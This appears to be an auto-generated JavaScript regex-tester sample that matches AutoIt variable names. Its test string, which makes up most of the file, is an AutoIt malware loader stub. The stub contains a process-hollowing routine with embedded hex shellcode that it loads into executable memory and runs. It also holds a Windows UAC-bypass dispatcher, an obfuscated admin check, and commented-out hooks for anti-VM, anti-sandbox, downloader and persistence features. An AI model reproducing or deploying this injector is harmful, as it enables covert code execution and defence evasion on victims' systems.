const regex = /$[a-zA-Z0-9_]+/gm;
// Alternative syntax using RegExp constructor
// const regex = new RegExp('$[a-zA-Z0-9_]+', 'gm')
const str = `Execute("Opt(""TrayIconHide"", 1)")
;~ Call("CustomAntiVM")
;~ Call("CustomAntiSandbox")
;~ Call("CustomDelay")
;~ Call("CustomStartup")
;~ Call("CustomDownloader")
;~ Call("CustomUACBypass")
Global \$ProcessId
Global \$XWNFIUYHFDUH = Execute('%INJECTION%')
Call("Hollowing",\$XWNFIUYHFDUH, "", GetResources())
;~ Call("CustomMeltFile")
;~ Call("CustomPersistence")
Func Hollowing(\$wPath, \$wArguments, \$lpFile)
Local \$ojnkoeyrcwxlutoux = "0x558BEC8B4D088BC180390074064080380075FA2BC15DC20400558BEC56578B7D0833F657E8D7FFFFFF8B"
Local \$kxghsiqvahwxnq = \$ojnkoeyrcwxlutoux & "C885C974200FBE07C1E60403F08BC625000000F0740BC1E81833F081E6FFFFFF0F474975E05F8BC65E5D"
Local \$sdqpidmqtyxkecrfsp = \$kxghsiqvahwxnq & "C20400558BEC51515356578B7D0833F68B473C8B44387803C78B50208B581C03D78B482403DF8B401803"
Local \$wtzfkbwb = \$sdqpidmqtyxkecrfsp & "CF8955FC894DF889450885C074198B04B203C750E882FFFFFF3B450C74148B55FC463B750872E733C05F"
Local \$xonwcuofeidefqludikidnevpgau = \$wtzfkbwb & "5E5B8BE55DC208008B45F80FB704708B048303C7EBE9558BEC81ECF003000053565733FF897DB8648B35"
Local \$qntpthgycxwcvzxicnjfif = \$xonwcuofeidefqludikidnevpgau & "300000008B760C8B760C8B368B368B76188975B8897DC8648B35300000008B760C8B760C8B368B761889"
Local \$bbrnxjj = \$qntpthgycxwcvzxicnjfif & "75C88D45B4C78558FFFFFF793A3C07898520FFFFFF8BF78D45E8C7855CFFFFFF794A8A0B898524FFFFFF"
Local \$shvtuoronlyjnrglhmeqvsbwvl = \$bbrnxjj & "8D45B0898528FFFFFF8D45A489852CFFFFFF8D45C0898530FFFFFF8D4598898534FFFFFF8D45D4898538"
Local \$llryfjxokqaibkgtpblwvnuqjat = \$shvtuoronlyjnrglhmeqvsbwvl & "FFFFFF8D45A889853CFFFFFF8D45A0898540FFFFFF8D4590898544FFFFFF8D4594898548FFFFFF8D45C4"
Local \$tnzfzyidgxogpmyh = \$llryfjxokqaibkgtpblwvnuqjat & "89854CFFFFFF8D45AC898550FFFFFF8D45CCC78560FFFFFFEE38830CC78564FFFFFF5764E101C78568FF"
Local \$qlzltjbdzlyqxqbpfpdakkbj = \$tnzfzyidgxogpmyh & "FFFF18E4CA08C7856CFFFFFFE3CAD803C78570FFFFFF99B04806C78574FFFFFF93BA9403C78578FFFFFF"
Local \$shawavvjwgeejpajlvgozrfp = \$qlzltjbdzlyqxqbpfpdakkbj & "E4C7B904C7857CFFFFFFE487B804C74580A92DD701C7458405D13D0BC745884427230FC7458CE86F180D"
Local \$wzbzixxgjpsmjfddpp = \$shawavvjwgeejpajlvgozrfp & "898554FFFFFF8B45C883FE02FFB4B558FFFFFF0F4F45B850E842FEFFFF8B8CB520FFFFFF890185C00F84"
Local \$urmwfppupodnjbbkzbuvayjx = \$wzbzixxgjpsmjfddpp & "910300004683FE0E7CD28BDF6A108D45D84350895DFCFF55E86A448D85DCFEFFFF50FF55E868CC020000"
Local \$utwnzgscykxocatlkoiicwgrlzg = \$urmwfppupodnjbbkzbuvayjx & "8D8510FCFFFF50FF55E88B4D10C78510FCFFFF070001008B713C03F10FB74614897DF8897DBC8945D039"
Local \$bjtoviobltcuiva = \$utwnzgscykxocatlkoiicwgrlzg & "BEA0000000741139BEA40000007409F6461601750333FF4733D2897DF433C08955EC6639110F94C03D4D"
Local \$ozemhyijlmqavynfcazqtevbgoz = \$bjtoviobltcuiva & "5A00000F840E03000033C039160F94C03D504500000F84FC02000033C0663956040F94C03D4C0100000F"
Local \$hritzmbigny = \$ozemhyijlmqavynfcazqtevbgoz & "84E80200008D45D8508D85DCFEFFFF5052526A04525252FF750CFF7508FF55A485C00F84AD0200008D85"
Local \$ritzicfhsdx = \$hritzmbigny & "10FCFFFF50FF75DCFF55A085C00F84980200006A006A048D45BC508B85B4FCFFFF83C00850FF75D8FF55"
Local \$ozujehkdcgtyardsqotqhsd = \$ritzicfhsdx & "9485C00F84780200008B45BC3B4634750F50FF75D8FF55B085C00F85610200006A406800300000FF7650"
Local \$irxtwsvzvwjd = \$ozujehkdcgtyardsqotqhsd & "6A00FF55988BD885DB0F84450200006A406800300000FF7650FF7634FF75D8FF55C08945F885C0753B85"
Local \$izqhuxcksyjsifkptzmq = \$irxtwsvzvwjd & "FF0F84230200006A406800300000FF765033FFC745EC0100000057FF75D8FF55C08945F885C075146800"
Local \$wvlrhnnkhhxcrnutzgzsehlki = \$izqhuxcksyjsifkptzmq & "8000005753FF55C48B5DFCE9F501000033FFFF7654FF751053FF55B433C0897DF0663B4606732C8B7DD0"
Local \$elrig = \$wvlrhnnkhhxcrnutzgzsehlki & "83C72C03FEFF77FC8B07034510508B47F803C350FF55B48B4DF08D7F280FB7460641894DF03BC87CDC8B"
Local \$fwjshmnzzhkr = \$elrig & "7B3C8B45F803FB837DEC008947340F848A000000837DF4000F84800000008B97A00000008365F40003D3"
Local \$dlbgbukrqnzulokbidbwcbbbsy = \$fwjshmnzzhkr & "83BFA400000000766B8B420433C983E808894DF0A9FEFFFFFF76450FB7444A086685C0742B25FF0F0000"
Local \$ghfzgrimeajcdqgrpswogsclqwf = \$dlbgbukrqnzulokbidbwcbbbsy & "03028945EC8BC88B46342904198B4DF08B47340FB74C4A0881E1FF0F0000030A0104198B4DF08B420441"
Local \$npcjancoclqgimzkks = \$ghfzgrimeajcdqgrpswogsclqwf & "83E808894DF0D1E83BC872BB8B4DF4034A04035204894DF43B8FA4000000729533FF57FF765053FF75F8"
Local \$galpkljedrneujjluxcqj = \$npcjancoclqgimzkks & "FF75D8FF55D485C00F84FEFEFFFF8D459C506A02FF7654FF75F8FF75D8FF55CC85C00F84E4FEFFFF33C0"
Local \$oabegzlochissjwuxeqavj = \$galpkljedrneujjluxcqj & "897DF4663B4606736C8B7DD083C73C03FE8B07A900000020741985C079046A40EB172500000040F7D81B"
Local \$kbxqhwwr = \$oabegzlochissjwuxeqavj & "C083E01083C010EB1585C079056A0458EB0CA9000000406A00580F95C0408D4D9C5150FF77E48B47E803"
Local \$bitjszjlemxpbjembznrx = \$kbxqhwwr & "45F850FF75D8FF55CC85C074128B4DF483C7280FB7460641894DF43BC8729E33FF68008000005753FF55"
Local \$slpnfpagpsoslgayirw = \$bitjszjlemxpbjembznrx & "C485C00F845BFEFFFF576A048D45F8508B85B4FCFFFF83C00850FF75D8FF55D485C00F843CFEFFFF8B46"
Local \$klzedfibwlphj = \$slpnfpagpsoslgayirw & "280345F88985C0FCFFFF8D8510FCFFFF50FF75DCFF559085C00F841BFEFFFFFF75DCFF55AC85C00F840D"
Local \$etixewnk = \$klzedfibwlphj & "FEFFFF8B45E0EB1D8B5DFC33FF837DD800740757FF75D8FF55A883FB050F8677FCFFFF33C05F5E5B8BE5"
Local \$N1 = \$etixewnk & "5DC20C00"
Local \$lpShellcode = DllCall("kernel32", "ptr", "VirtualAlloc", "dword", 0, "dword", BinaryLen(\$N1), "dword", 0x3000, "dword", 0x40)[0]
Local \$File_Struct = DllStructCreate("byte lpfile[" & StringLen(\$lpFile) & "]")
BitAND(DllStructSetData(DllStructCreate("byte shellcode[" & BinaryLen(\$N1) & "]", \$lpShellcode), "shellcode", \$N1),DllStructSetData(\$File_Struct, "lpfile", \$lpFile))
\$ProcessId = DllCallAddress("dword", \$lpShellcode + "0xBE", "wstr", \$wPath, "wstr", \$wArguments, "ptr", DllStructGetPtr(\$File_Struct))[0]
EndFunc
;~ %OPT%
Func CustomUACBypass()
Local \$ejifuhzuieh = Execute(BinaryToString("0x497341646d696e2829"))
Local \$QSZUIEHZ = "WIN_10"
Local \$ONUHBFE = "WIN_7"
If Not \$ejifuhzuieh Then
Local \$QSDJSI = @OSVersion
If \$QSDJSI == \$QSZUIEHZ Then
CustomWin10Elevation()
ElseIf \$QSDJSI == \$ONUHBFE Then
CustomWin7Elevation()
EndIf
EndIf
EndFunc
Func CDEL(\$SLTIME,\$SLEOO)
For \$i = 0 To \$SLEOO
DllCall("kernel32.dll", "none", "Sleep", "dword", \$SLTIME/ \$SLEOO)
\$avar = 999
While \$avar == 999
\$avar = \$avar + 1 * \$avar - 1 ^ 405 + \$avar * \$avar
\$avar = 11200
WEnd
Next
EndFunc`;
// Reset `lastIndex` if this regex is defined globally
// regex.lastIndex = 0;
let m;
while ((m = regex.exec(str)) !== null) {
// This is necessary to avoid infinite loops with zero-width matches
if (m.index === regex.lastIndex) {
regex.lastIndex++;
}
// The result can be accessed through the `m`-variable.
m.forEach((match, groupIndex) => {
console.log(`Found match, group ${groupIndex}: ${match}`);
});
}
Please keep in mind that these code samples are automatically generated and are not guaranteed to work. If you find any syntax errors, feel free to submit a bug report. For a full regex reference for JavaScript, please visit: https://developer.mozilla.org/en/docs/Web/JavaScript/Guide/Regular_Expressions